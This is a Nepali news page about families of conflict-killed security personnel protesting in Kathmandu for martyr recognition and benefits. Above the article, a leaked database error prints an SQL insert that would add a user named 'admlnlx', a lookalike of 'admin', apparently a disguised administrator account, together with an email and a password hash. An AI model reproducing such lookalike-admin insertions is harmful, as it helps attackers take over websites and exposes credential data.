WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvDJ76S3Y8r/eN3Xiv3B53YROB51Ii/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 12:01:45', '', 'admlnlx', 'admlnlx')
गाउले न्यूज, २६ पौष, काठमाडौं । द्वन्द्वपीडित सुरक्षाकर्मी परिवारका सदस्यहरुले विभिन्न माग राख्दै काठमाडौमा प्रदर्शन गरेका छन् । उनीहरुले आफ्ना माग पुरा नभएसम्म आन्दोलन नरोक्ने चेतवानी दिएका छन् । प्रदर्सनकारीहरु मर्न तयार रहने तर माग पुरा नभएसम्म आन्दोलन नछाडने बताएका छन् ।

द्धन्दपीडित संघर्ष समितिकी अध्यक्ष हिमकुमारी घर्तिले द्वन्द्वपीडित सुरक्षाकर्मी परिवारले विगत लामो समयदेखि द्वन्द्वका कारण ज्यान गुमाएका सुरक्षाकर्मीहरुलाई सहादत प्राप्त भएकै दिनदेखि लागु हुनेगरी सेवा सुविधा र सहिद घोषणा तथा उच्च सम्मान गर्नुपर्ने लगायतका माग राखेर आन्दोलन गरेको बताइन् ।

संघर्षसमितिले आफ्ना मागबारे प्रधानमन्त्री, गृहमन्त्री, विभिन्न राजनैतिक दलका नेताहरुलाई भेटेर ध्यानाकर्षण गराएपनि राज्यले नसुनेका गुनासो गरेका छन् ।

